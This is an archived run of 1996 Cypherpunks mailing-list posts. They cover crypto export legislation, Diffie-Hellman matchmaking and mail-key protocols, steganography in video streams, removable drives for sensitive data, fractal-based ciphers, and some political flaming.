> Thought the gotcha was down in the part about the Secretary of Commerce. 
> My reading is that the secretary will still be required to grant
> approval for commercial export. Is past the part about no regulation
> inside the US (which is true now - still would be nice to see a "Congress
> shall make no law..."). The puzzler is the requirement that a comperable 
> foreign product must exist before permission to export will be granted.
> 
> Will this be like "comparable product" price matching in discount houses ?
> Somehow there never is one...

No.  Right now crypto exports fall under the State Department (which is
in the business of saying "no") unless they decide otherwise, in which case
it goes to the Commerce department (which is in the business of saying "yes").
Under the bill, for non-mass-market software and hardware, the Commerce
department must issue a license if equal strength crypto is already available
outside the country.  But the biggest win is that, under the bill, you don't
need a license from anyone in the case of mass-market (or public domain)
software (or hardware bundled with mass-market crypto software).  You
can just export it.

See the analysis of the bill in http://www.vtw.org.

Personally, on balance, I think the bill, as written, is a big
enough step forward to be worth supporting.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 10 Mar 1996 21:54:58 +0800
To: cypherpunks@toad.com
Subject: Switchboard
Message-ID: <v01540b03ad642b2e0ae6@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Check out www.switchboard.com. From the blurb:

find people
                 Find friends, colleagues, and old roommates for free. Any time,
                 nationwide. Look up over 90 million names and get fast response
                 to addresses, phone numbers, and personalized updates. Even
                 send email to registered users.
  find
  businesses
                 Find over 10 million businesses across the U.S.A. for free.
                 Whether or not they're on the web. Day or night with immediate
                 results.

Is this the same data that was supposed to go on that Lotus CD-ROM? Is this
publicly available info?




-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 10 Mar 1996 03:26:08 +0800
To: cypherpunks@toad.com
Subject: EXR_ciz
Message-ID: <199603070309.WAA18720@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-5-96. TWP: 
 
   "Untangling the Spy Network's Webs." 
 
      Chairman Combest of the House intelligence committee 
      yesterday proposed making the CIA's DO into a separate 
      service and splitting the NRO into two giant technical 
      agencies to handle satellites. The CIA would control 
      most long-range intelligence work, some of which is now 
      handled by the CIO and some by the NSA. The biggest 
      change in terms of size would put the NSA, which has 
      more than 25,000 analysts, in a new Technical Collection 
      Agency that would also take in the managerial functions 
      of NRO and parts of imagery analysis from CIO. 
 
   3-5-96. NYT: 
 
   "Proposal Would Reorganize U.S. Intelligence Agencies." 
 
      The intelligence services are held in low regard by the 
      public and some leaders -- State complains about the 
      quality of analytical papers; Defense bad-mouths the 
      quantity of intelligence; and Congress gripes about too 
      many secrets and not enough accountability. Rep. Goss, 
      a former member of the CIA's DO, said the proposal aimed 
      to rebuild the credibility of the agency's spies: "The 
      whole exercise we're going through is meant to restore 
      that." 
 
   EXR_ciz 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarissa_wong@alpha.c2.org (Clarissa Wong)
Date: Thu, 7 Mar 1996 18:37:58 +0800
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <199603070638.WAA11611@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> ... With net-phone projects like Free World Dialup ...

My thanks to "Declan B. McCullagh" <declan+@CMU.EDU> for his timely
and informative reply.  I am somewhat embarrassed to see the
inadequacy of my homework but appreciate the lesson.  A web search
on "Free World Dialup" yielded several tasty URLs, including:
    http://www.pulver.com/fwd/
and:
    http://www.bekkoame.or.jp/~brandon/fwd/servinfo.html
These people possess both a subtlety of purpose and an organizational
capability that exceed my initial ham-handed efforts, yet their
cognizance of the value of ecash is uncertain.

> FCC PETITIONED TO STOP MISUSE OF THE INTERNET!

It's not surprising that the ACTA coalition chose to solicit their armed
friends to protect them from superior technology.  But events are unfolding
faster than I anticipated.

Jim McCoy <mccoy@communities.com> pointed out that:

> 1- Chaum did not have the clue to pick up on this when two
>    cypherpunks (who shall remain nameless...) pitched this
>    and several other ideas to involve ISPs in jump-starting ...

I don't know about Chaum but perhaps now one can work around the ISPs,
making the game accessible to anyone with a spare computer and some spunk.
Sometimes for as little as $20. / month one can buy unlimited 28.8 PPP
access.  With the proper voice modem, two phone lines, and some software,
perhaps Joe's Homebrew International Phone Service can go into business.

  CW




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Sun, 10 Mar 1996 03:25:53 +0800
To: warwick.com!uunet!in2.uu.net!newsfeed.internetmci.com!gordius!news.service.uci.edu!usenet@virginia.va.grci.com
Subject: Re: http://www.grfn.org/~blacktar/KilltheNewbies.htm
In-Reply-To: <313DE81A.6403@grfn.org>
Message-ID: <Pine.SCO.3.91.960306231435.16899C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Mar 1996 warwick.com!uunet!in2.uu.net!newsfeed.internetmci.com!gordius!news.service.uci.edu!usenet@virginia.va.grci.com wrote:

> http://www.grfn.org/~blacktar/KilltheNewbies.htm

It appears that we're not only the UUCP test bed of choice, but are 
expected to test mysterious JAVA scripts when grabbing this web page....

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 10 Mar 1996 21:54:53 +0800
To: cypherpunks@toad.com
Subject: Re: Switchboard
Message-ID: <199603070725.XAA10999@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:05 PM 3/6/96 -0800, Steven Weller wrote:
>Check out www.switchboard.com. From the blurb:
>
>find people
...

I checked them out and the couldn't find my record.  Since I have a listed
telephone number, I can only assume that their records do not include GTE
local service records or some other equally huge gap.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!gatech!newsfeed.internetmci.com!athos.itribe.net!logrus!page@warwick.com (d.)
Date: Thu, 7 Mar 1996 13:46:03 +0800
To: cypherpunks@toad.com
Subject: test
Message-ID: <4hl7ck$e95@athos.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain




test.

d.


--
Homo vult decipia; decipiatur.                                page@itribe.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Mar 1996 21:57:00 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: Re: Square pegs in round holes, matchmaking, corporate mailservers
Message-ID: <199603070738.XAA22980@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:01 PM 3/5/96 -0500, "A. Padgett Peterson P.E. Information Security"
<PADGETT@hobbes.orl.mmc.com> wrote:
[>>Dimitris Tsapakidis <dimitrt@dcs.rhbnc.ac.uk> wrote:]
>  >Bob must find out whether Alice has declared (commited) her interest
>  >in him, if and only if he has declared (commited) his interest in her.
>  >Before he does so, he can at most know that a girl is interested in him.
>  >Another description: Bob and Alice can have a date if they both commit
>  >to each other. If only one commits, nobody will ever find out about it.
>  >- T is the trusted third party.
>  
>  Well if we *must* use D-H that is a way, but why do that ? Instead of
>  using a binary assymetric key, why not a triple ? (Just because I do not
>  know of any does not mean that one does not exist).
>  
>  Consider a function such that Alice has a key such that given a message M,
>  when encrypted by Alice may be manipulated by T such that Bob can decrypt
>  it. Similarly, Bob has a key that when manipulated by T' can be read by
>  Alice. Assymetric but not binary. The advantage here is that while "T"
>  is trusted by both, he/she/it/other is not able to read either message, 
>  rather acts as a catalyst.

Oh, that would work fine.  Let a, b, and t be Alice, Bob, and Trent's secret DH
keys, and g and p be the generator and prime (all math below is mod p.)
If Bob wants to talk to Alice, he sends Trent B = g**b, marked "For Alice",
optionally anonymously.  Trent calculates X = B**t == g**bt, and sends it to
Alice.
Alice calculates K = X**a == g**bat, calculates H = Hash(K) and 
posts it anonymously, or sends it to Trent to post or mail to Bob. 
If Alice wants to talk to Bob, she calculates A = g**a mod p,
sends it to Trent, optionally anonymously, marked "For Bob".
Trent calculates Y = A**t == g**at , and sends it to Bob.  
Bob calculates K' = Y**b == g**abt, calculates H' = Hash(K') and
notices that it's the same as the H he pulled off the net earlier.
Bob says "Oh, wow!  Alice wants to talk to me!", encrypts some lame drivel 
of a message M with key K'==K, and mails it to Alice if he knows her address
or posts it with Subject: H', which Alice receives.

Comments:
1) If Alice doesn't also want to talk to Bob, or Bob doesn't want to talk to
Alice,
they don't both come up with H == H', so they only know that _some_
shy person wanted to talk to them but not who it is.

2) Why does Alice reply to the anonymous message?  Maybe just because
she's free that evening, or maybe because it included a note with it
that made her think the sender is a Nice Guy.

3) Under this method, Alice, Carol, Eve, and Greta can get together and notice
that they've all gotten mail with keys X; they don't know who X is, but
they know he's interested in all of them and he's probably a trolling loser :-)
So they all dump him.  However, even though they know Bob's public key B,
they don't know t, so they can't tell from g**bt mod p that it's Bob,
so they can't send him email saying "Get lost, loser" without revealing their
identity.  So Trent is providing anonymity, and needs to be trusted.

Without Trent, you could do a two-way version of the protocol - if Bob wants to
talk to Alice, he posts Hash(A**b), and vice versa, but Alice can go evaluate
Hash(B**a), Hash(C**a), Hash(D**a), etc., for everyone in the phone book,
and find out that it was Bob.

4) If Bob wants to reduce the level of trust he needs to have in Trent,
he can create a bunch of keys b1, b2, b3, ...., bk in addition to b,
and use a different one for each note.  If I remember correctly,
he can often calculate the inverse of b, b1,... (??????)
So he sends Trent B1=g**b1, Trent sends Alice X1=B1**t == g**b1t,
Alice calculates K1=X1**a == g**b1at, H1=Hash(g**b1at), and posts/sends.
Since she's also interested in Bob, she does the same with key a,
so Trent gives Bob K'g**bat.  Bob calculates Z = K'**binv == g**at(b*binv) mod p
== g**at, and then calculates Hash(Z**b1), Hash(Z**b2), Hash(Z**b3)...,
and notices that H1 = Hash(X**b1) and says "Oh, it's Alice!"

On the other hand, this doesn't appear to work if Alice is also using
multiple identities.

5) If Trent is a really trustable guy, he can offer meeting services
for people who have unusual tastes, such as liking (Exon) and Duct Tape
and Political Party Z and (for bipartite variants) suppliers and consumers
of various substances.  So he could broker a list of (Exon)fans,
as long as the activity is not criminal enough to lead to subpoenas or
warrants for his transactions (if he keeps them) or his key t
(or t1, t2, t3... if he's running multiple lists.)

Dimitris's approach of using
Hash(message) could be used to exchange preference here as well.
If Alice checks the message for Hash("Duct Tape"), she can decide
that she and the unknown sender would be a great match, 
and if she hadn't thought to check Hash((Exon)) she wouldn't
know that Bob enjoyed that also.  So it's at least some privacy for
low-popularity unusual activities :-)

6) Of course, Trent really could be a front for Blacknet :-)  Or Trent's key
could be stolen and published, embarassing all his customers.

>  As to why you would want such a curiosity, consider a corporation with 80,000
>  mailboxes. It would be desirable for each person to be able to send E-Mail
>  to any other person but not desirable for each person to have to hold all
>  80,000 keys.  Given a triple (tertiary ?) function each individual would only
>  need their receive key and a "post office" transmit key.  On sending a
message,
>  it would be encrypted with a session key and the session key encrypted
with the
>  post office key.  The post office would have all 80,000 receive functions but
>  through the assymetic keying would only be able to convert the session
key to something
>  each intended recipient could decode but not be able to decode the message
>  itself.
  
>  This would meet both criteria (not key escrow but that is under "management")
>  D-H is wonderful but has difficulties with scalability.  If such a function
>  existed (has anyone looked ?) it would solve the problem.

Ah.  The method I described above doesn't solve your problem;
it just solves the original Shy-People's-Dating problem.
If your only concern is scalability, and you don't mind doing the
multiple-message handshaking Diffie-Hellman requires (<=SPD...),
you can use either a signed-keypart Diffie-Hellman or just use
PGP with the mailserver signing keys and keyserving.

PGP approach:  Bob has Public/private keys B/b, Alice A/a, Trent T/t, Sam S/s.
Trent is the mail agent at Alice's company, T is well-known.
Sam is the mail agent at Bob's company, S is well-known.
"Well-known" means that all the mail servers know each other's pubkeys.
If Alice and Bob both use the same postoffice, Sam==Trent, so it's simpler.

Bob to Sam:   Fetch Alice's Key
Sam to Trent: Fetch Alice's Key
Trent to Sam: A (signed by T)
Sam verifies  and caches A(signed by T), and already knows T.
Sam to Bob:   A (signed by T), T (signed by S).
Bob verifies  T's signature on A, S's on T. 
Bob to Sam:   To: Alice@trent.aliceco.com, PGPEncrypted(Message,A)
Bob either caches A, or caches T, or doesn't bother.
Sam to Trent:   (ditto)
Trent to Alice: (ditto)
Alice decodes the message.  If she needs Bob's keys, she asks Sam to fetch them.

So there's basically a key-fetching handshake, with Trent and Sam 
acting as CAs as well as keyservers, and then regular PGP.
Clean, simple, and all your regular tools work, except of course
that the keyservers use some database to store keys in instead of
a big hulking PGP keyring.

A Diffie-Hellman relative is a bit messier, because it's Diffie-Hellman.
Assume that the modulus and generator p and g are agreed on (e.g. Photuris's.)
Alice and Bob have their PGP public keys A, B.
Trent and Sam have their PGP public keys T and S, well-known.

Bob generates a random x, calculates X = g**x mod p.
Bob to Sam:     To: alice@trent.aliceco.com, X signed B.
Sam to Trent:   To: alice@trent.aliceco.com, X signed B, B signed S.
Trent to Alice: To: alice, X signed B, B signed S, S signed T.
Alice generates random y, calculates Y = g**y mod p, also K = X**y mod p.
Alice to Trent: To: bob@sam.bobco.com, Y signed A
Trent to Sam:   To: bob@sam.bobco.com, Y signed A, A signed T
Sam to Bob:     To: bob, Y signed A, A signed T, T signed S
Bob verifies Y, A, T, calculates K' = Y**x mod p == K.
Bob to Sam:     To: alice@trent.aliceco.com, Encrypted(Message,K).
Sam to Trent:   (ditto)
Trent to Alice: (ditto)
Alice decodes the message using K.  To make things simpler,
Bob might include Hash(K) or some other message identifier.

In this case, the key-fetching handshake is piggybacked along with the
DH key-exchange halves, and then Bob uses the jointly derived session key
to send a conventionally-encrypted message (which he _could_ use PGP for...)

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
#





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 7 Mar 1996 19:00:27 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Jump Start ecash With IPhone
Message-ID: <199603070739.XAA23003@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 AM 3/6/96 -0500, "Declan B. McCullagh" <declan+@CMU.EDU> wrote:

>WASHINGTON, March 4 /PRNewswire/ -- The America's Carriers
>Telecommunication Association (ACTA), a trade association of
>competitive, long distance carriers today petitioned the Federal
>Communications Commission (FCC) to stop companies from selling
>software and hardware products that enable use of the Internet to
>voice long distance services.
....
>CONTACT:  Charles H. Helein, general counsel, 703-714-1301, or Jennifer Durst-
>Jarrell, executive director, 407-332-9382, both of America's Carriers
>Telecommunication Association

Their complaint was that Internet time, at $2/hour, is 3.3 cents/minute,
far cheaper than the 22 cents/minute many of them are charging.
(The real price is, of course, double that, 6.6cents, because both ends of the
connection need Internet connections.)  I assume they're hoping that
the FCC won't know that the "hardware and software products" are
the sound cards that almost every new PC sells with and software
ranging from $50 down to free, and offers encryption which they don't,
as well as voice quality ranging from worse to much worse to better.  
Some of the software works over the Internet, some chooses to get better
voice quality over direct modem connections (which use their services.)

They're also sleazing over the issue that many businesses are using
low-bit-rate voice on their private networks to squeeze more voice calls
into the networks they buy at bulk rates, most of which are billed
at rather less that 22 cents/minute.  If you're fitting four 16kbps calls
into the 64kbps standard voice circuit, and you're paying 12 cents/minute,
that's 3 cents/minute/call.

And _really_ big bulk-buying customers are paying a lot less than 22 cents -
I read in the papers that the Federal Telephone System is under 5 cents/minute.

                        Bill Stewart

P.S. Yes, I work for one of their competitors, though I'm not in the
voice business, and not speaking for my employer.  Aside from being
a concerned citizen, and a voice telephone service customer who
objects to companies that try to use the government to stomp their competitors
instead of competing against them freely, I'm also an Internet user.
Yes, the Internet is providing lots of new and exciting communications
possibilities, and if you're worried that people are going to use
the Internet for low-cost un-wiretappable encrypted phone calls that
sound worse than ham radio and allow folks in third-world countries
to better afford communications, go into the Internet business yourself.

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
#





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Mar 1996 21:55:41 +0800
To: cypherpunks@toad.com
Subject: Re: Steganography idea: CU-SeeMe
Message-ID: <199603070739.XAA23010@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:28 AM 3/6/96 +0000, Ed Carp <erc@dal1820.computek.net> wrote:
>On Wed, 6 Mar 1996, Nelson Minar wrote:
>> So here's one idea I've had as a place to hide a channel: network
>> video, in particular CU-SeeMe video streams. CU-SeeMe is a lowtech
>
>I think it likely that people will be sending GIFs and JPEGs to each 
>other far more often than video.  Video is far more an "uncommon 
>communications channel" than is a uuencoded picture.

The Quickcam videocameras are $100; they're the next toy to buy after
you've got the Soundblaster, CDRom, and 100MB Zip drive.  The Macintosh
folks will buy them first (:-), but pretty soon they'll be very common,
especially for business LAN users to have desktop video.

The problem is that, unlike GIFs, CU-SeeMe and other low-bit-rate video 
compression schemes are _very_ lossy.  You can't just put the stego bits
in the raw image before running the compression, because they'll get lost,
and if you try to fit them in to the compressed image, you've got to do it
very carefully or they'll really drastically affect the image.

I don't know CU-SeeMe's compression algorithm, but imagine putting bits
into a run-length-encoded file: if you put them in the run-length,
you'll change the lengths of the runs a lot.  If you put them in the color,
you'll get lots of streaks of random-looking noise.  Either way,
it's quite noticeable.  So you've got to work very carefully with the algorithm.

The other problem with CU-SeeMe is dropped frames, which someone mentioned.
That's easier; any email system, especially a stego type, has to deal
with lost message.  So try to fit your messages into single CUSM frames,
and build some tracking or ack messages or maybe message numbering,
so you can detect lossage and request retransmits.  It can be as complex
as X.25-over-stego-over-CU-SeeMe, or as simple as "Message 14 of 32, RSVP".
(If you _do_ implement X.25-over-stego-over-CU-SeeMe, you've got a fine
April 1 RFC :-)
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
#





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!munnari.OZ.AU!news.mel.connect.com.au!harbinger.cc.monash.edu.au!usenet@warwick.com
Date: Sun, 10 Mar 1996 22:59:04 +0800
To: cypherpunks@toad.com
Subject: Re: PLEASE REPLY!!
Message-ID: <4hl854$npd@harbinger.cc.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


david@emeraldis.com (David G. Cannon) wrote:
>Did this message make it out to the "real" world?? Please reply to this message 
>if it did. Thankyou.
>
>*David*
>
Your message did make it David.
Hi from Australia!!

Jim / jaar1@student.monash.edu.au






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 10 Mar 1996 03:22:55 +0800
To: cypherpunks@toad.com
Subject: Re: Bootable disks
Message-ID: <199603070447.XAA27950@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


My understanding was that the parallel-port version of the Syquest drive
would also be bootable. That is, you would boot the driver off a floppy and
then the rest of the boot sequence would be handled by whatever was on the
Syquest drive. 
 
THis, I thought, would let you install something like linux and the various
other software to give you a very portable anon server, neatly containing a
separate OS and all the "incriminating evidence" while the regular hard
disk held nothing other than Windows and Doom. 
 
Is this not the case? 
 
--tallpaul 
 
On Mar 06, 1996 14:55:44, 'JonWienke@aol.com' wrote: 
 
 
>I recently installed an IDE version of the Syquest EZ 135 hard drive for a

>client.  Since it is a fully functional hard drive, it is bootable, unlike

>the parallel port model.  The biggest advantage to this type of drive is
that 
>the cartridge (and any potentially incriminating data) can be quickly
removed 
>and destroyed (burn it, smash it with a large heavy object, insert it into
a 
>bulk eraser) or taken to a secure location for storage.  Also, this type
of 
>drive provides an excellent place to put swap files, which have an
annoying 
>tendency to pick up sensitive data.  That is less of a problem if you can 
>remove the cartridge and store it in a secure location when not processing

>sensitive data. 
> 
>Jonathan Wienke 
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.ios.com!news2.ios.com!usenet@warwick.com (Mr. Sam)
Date: Thu, 7 Mar 1996 14:16:36 +0800
To: cypherpunks@toad.com
Subject: What do these words mean on your planet?
In-Reply-To: <AHALL.96Mar1143852@remus.cs.uml.edu>
Message-ID: <4hl8en$mnv@news2.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


In <AHALL.96Mar5083553@remus.cs.uml.edu>, ahall@cs.uml.edu (Andrew Hall)
wrote:

>>>>>> Sam  writes:

>   Sam> In <AHALL.96Mar1143852@remus.cs.uml.edu>, ahall@cs.uml.edu (Andrew Hall)
>   wrote> 

>   >>>>>>> Sam  writes:

>   Sam> In <tilleyDnK4Kp.HsD@netcom.com>, tilley@netcom.com (Tom Tilley) wrote:
>   >> >> In article <4h23li$p20@news2.ios.com> mrsam@soho.ios.com (Mr. Sam) writes:
>   >> >>> In <tilleyDnG5Js.1DB@netcom.com>, tilley@netcom.com (Tom Tilley) wrote:
>   >> >>> 
>   >> >>>> a.c, a.flame.r-l, and a.c-e.c.w removed.
>   >> >>> 
>   >> >>>> In article <4gqd9u$u6@news2.ios.com> mrsam@soho.ios.com (Mr. Sam) writes:
>   >> >>> 
>   >> >>>>> Here's one: why doesn't it say 'no tax on capital gains', like for other
>   >> >>>>> categories, hhhhhhhhhmmmmmmmmmmmmmm?
>   >> >>> 
>   >> >>>> I don't know about where you're from, but here on planet
>   >> >>>> Earth zero'ing out taxes is the same as "no tax."
>   >> >>> 
>   >> >>> I don't know about what's it's like over there, but in this universe, words
>   >> >>> mean things.

>   >> >> Yes, they do, and whether you like it or not "zero out capital
>   >> >> gains tax" means the same thing as "no tax on capital gains."

>   Sam> Nope.  In case you haven't noticed, a few words differ from one to another.
>   Sam> And, as I said, words mean things.

>   >> >> Deal with it.

>   Sam> I do.  I have a dictionary.

>   >> Please let me know which dictionary it is that says
>   >> "zero = 17%".  I want to be sure not to get a copy.

>   Sam> The same one that says, for you, that convicted drug users are always
>   Sam> innocent.

>I used common sense for that.  What is your excuse?

No, you didn't.  "Convicted" is not the same thing as "innocent", how does
that grab you?  Conviction logically follows being proven guilty.  And guilty
is the opposite of innocent, at least on my planet.

--
Mr. Sam: member, talk.politics.misc troll patrol
         channel operator, #Sci-Fi - Undernet IRC sci-fi/fantasy channel
                           http://www.cyberstorm.com/~rockd/sci-fi.html
_____________________________________________________________________________
"Government is not a solution to our | "First of all, keep in mind that most
problem, government IS the problem." | of our problem is with working
 -- R. Reagan.                       | Americans." -- B. Clinton.
_____________________________________|_______________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.ios.com!news2.ios.com!usenet@warwick.com (Mr. Sam)
Date: Mon, 11 Mar 1996 06:21:01 +0800
To: cypherpunks@toad.com
Subject: Re: Pat Buchanan, anti-semite and ... the next Crossfire host!
In-Reply-To: <petrichDnF6IL.2qo@netcom.com>
Message-ID: <4hl8g0$mnv@news2.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


In <313cf45d.11750162@198.4.75.50>, voltai29@chelsea.ios.com (Volty) wrote:

>That's not what the election results for the Republican primaries and
>caucuses tonight (Tuesday, March 5, 1996) are saying. It appears that
>the hand picked GOP geezer and sacrificial lamb to Bill Clinton in

Dolty is very predictable.  While it looked like Mr. Pat was going to pull
ahead, his spew was directed at him.  Now, that Mr. Bob is forging ahead,
expect Dolty to start ranting against Mr. Bob.  You wait, in a few months
he'll be saying nice things about Mr. Pat.  Mark my words.  This loser is not
really interested in anything factual to discuss.  He is so deathly afraid of
Mr. Bill being sent back to Arkansas, that he would blaspheme even against God
himself, if he was running on the Republican ticket.

>November is running away with the Republican nomination. Pat will just
>have to goose step back to Crossfire after he finished splitting the
>party right down the middle (right?).

Wrong.  You are rarely right on anything.

--
Mr. Sam: member, talk.politics.misc troll patrol
         channel operator, #Sci-Fi - Undernet IRC sci-fi/fantasy channel
                           http://www.cyberstorm.com/~rockd/sci-fi.html
_____________________________________________________________________________
"Government is not a solution to our | "First of all, keep in mind that most
problem, government IS the problem." | of our problem is with working
 -- R. Reagan.                       | Americans." -- B. Clinton.
_____________________________________|_______________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Mar 1996 18:19:40 +0800
To: cypherpunks@toad.com
Subject: Fractals, Cellular Automata, and Encryption
Message-ID: <ad63bf5600021004e133@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Note: I have changed the thread title from the meaningless "Signature"
(meaningless to this context) to something I think is more appropriate.
Someone recently wrote to me asking why I so often change thread names, as,
in his words, "it screws up the threading in my reader." Well, I think
accurately labelled articles are more important that having a reader place
an article in its "correct" position when the themes have changed so much.

I urge all of you to think about what your article says and what the most
accurate name is for it. By all means leave the name the same if you want,
or if the Hamming distance is not too great. But if the topic has changed
away from the name given by default, then _change_ the name to reflect the
topic at hand.

On to the actual article:


At 11:54 PM 3/6/96, Mark M. wrote:
>On Tue, 5 Mar 1996, Charles Choi (SAR) wrote:
>
>> 1)    Is it possible to base a privacy key ( e.g. PGP ) on a fractal
>>               equation, instead of an algorithm based on two primes?
>>               This would allow for an eternal level of complexity due
>>               to infinite field of depth one can find as one 'zooms in'
>>               closer ( correct me because I'm wrong; I'm not a math major,
>>               although increasingly I wish I was... ), allowing for near
>>               unbreakable privacy of information.
>
>The fact that the private key is based on fractals rather than prime numbers
>really doesn't make a difference.  Fractals are not random, and do in fact,
>have a pattern.  The Mandelbrot Set, for instance, can be expressed in a
>few bytes of information even though it is infinitely complex.  Therefore,
>the fractal has extremely low entropy making it a bad choice from which to
>obtain random data.

Besides these points, something missing from cellular automata-based crypto
schemes is this: invertibility with a different key than was used to
encrypt. That is, in any fractal or cellular automata-based schemes I have
seen, a generator iterates a data set, transforming it into something which
appears to have "no resemblance" to the original data set. The problem is
that there is no second key, the decryption key (or "private" key) which
reverses the process and recovers the original data set.

That is, it is certainly possible to get some "messy" output by running a
cellular automata (think: "the Game of Life" as an example) on an input. An
attacker would be hard-pressed to determine the starting pattern if given
the nth generation! So far, so good.

The problem is that the _recipient_ would also have a hard time determining
the starting pattern! And a more detailed wrinkle is this: at best, the
system would be a single-key or symmetric system, losing the advantages of
a public key system. At worst, the scrambled message could _never_ be
recovered, as no inverse can be found of the CA. (In CA research, finding a
starting pattern from some nth generation is known as the "Garden of Eden"
problem, for reasons I won't get into here. Clearly, some CAs have no
single inverse, as multiple inputs map into the same output--again, think
of "Life.")

Steven Wolfram had some speculations about using fractal or cellular
automata-based systems for a new kind of cipher. His paper is in one of his
books ("Theory and Application of Cellular Automata"), but it doesn't
really get beyond just speculating. And, I recall that someone proved
several years ago that Wolfram's CA-based encryption scheme was formally
equivalent to a linear congruential generator.

I think I included a few paragraphs on this topic in my Cyphernomicon.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Thu, 7 Mar 1996 17:37:13 +0800
To: cypherpunks@toad.com
Subject: Re: Boycott "Applied Cryptography" and AT&T and RSA
Message-ID: <199603070500.AAA28329@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



VTW supports the Leahy/Goodlatte bill, since it helps to free lots and
lots of cryptography that is currently being crushed under the weight
of the Clinton Administration's cryptography export regulations.

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

PS AT&T makes so much money in a year that if everyone on cypherpunks
   switched to Sprint, it still probably wouldn't even put a dent in
   their annual budget for paperclips.

anonymous-remailer@shell.portal.com writes:
>Bruce Schnier (Author of applied cryptography) and Matt Blaze (Who
>is a crypto bigwig at at&t) have made it clear that they support
>key escrow. Both have written letters in favor of the new crypto
>law, it creates a key escrow system and also other restricts on
>crypto. The letters are on the CDT homepage and i think were
>posted here.
>
>WHAT THE FUCK??????????????????????????????????????????
>
>EFF, EPIC, VTW and almost everyone else (except for Bizdos at RSA, hmmmm)
>have all come out against this piece of shit. But with these so called
>experts baking it it could pass anyway.
>
>Maybe the ltrs are a forgery? We should ask them, and if this is true, LETS
>SEND THEM A MESSAGE!!!!!!!! SWITCH YOUR PHONE SERVICE AND TELL AT&T WHY!!!
>STOP RECOMMENDING APPLIED CRYPTO (THERE ARE EASIER BOOKS ANYWAY). DEMAND
